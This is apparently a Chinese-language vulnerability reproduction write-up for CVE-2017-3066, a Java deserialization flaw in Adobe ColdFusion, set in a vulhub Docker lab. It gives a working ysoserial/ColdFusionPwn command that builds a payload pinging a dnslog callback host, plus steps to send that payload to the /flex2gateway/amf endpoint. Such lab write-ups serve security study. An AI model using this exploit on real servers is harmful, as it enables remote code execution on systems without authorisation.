漏洞描述

Adobe ColdFusion是一个动态Web服务器,其所采用的CFML(ColdFusion Markup Language)程序设计语言类似JSPJSTL(JSP Standard Tag Lib)CFML是一种针对Web应用的脚本语言,文件后缀为.cfm

Adobe ColdFusion存在Java反序列化漏洞,攻击者可通过该漏洞在应用程序上下文中执行任意代码或造成拒绝服务。

影响版本

Adobe ColdFusion(2016 release) Update 3及之前版本。

Adobe ColdFusion 11 Update 11及之前版本。

Aodbe ColdFusion 10 Update 22及之前版本。

漏洞复现

git clone https://github.com/vulhub/vulhub.git
cd vulhub/coldfusion/CVE-2017-3066
docker-compose up -d

访问链接http://<ip>:8500/,显示页面无法展示,还有一个大的404头像。

访问http://<IP>:8500/CFIDE/administrator/index.cfm,默认密码为vulhub,然后有一个初始化成功页面。

利用工具:

Releases · codewhitesec/ColdFusionPwn (github.com)

https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

生成poc.ser

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'ping oopsdc.zzn11a.dnslog.cn' poc.ser

然后抓取访问http://<ip>:8500/flex2gateway/amf的数据包,请求方式更改为POSTContent-Type更改为application/x-amf,在最后面选择从文件中复制,然后将poc.ser文件内容粘贴到请求中,点击转发包,查看dnslog记录即可。

文章许可:本文采用CC BY-NC-SA 4.0许可协议,转载请注明出处。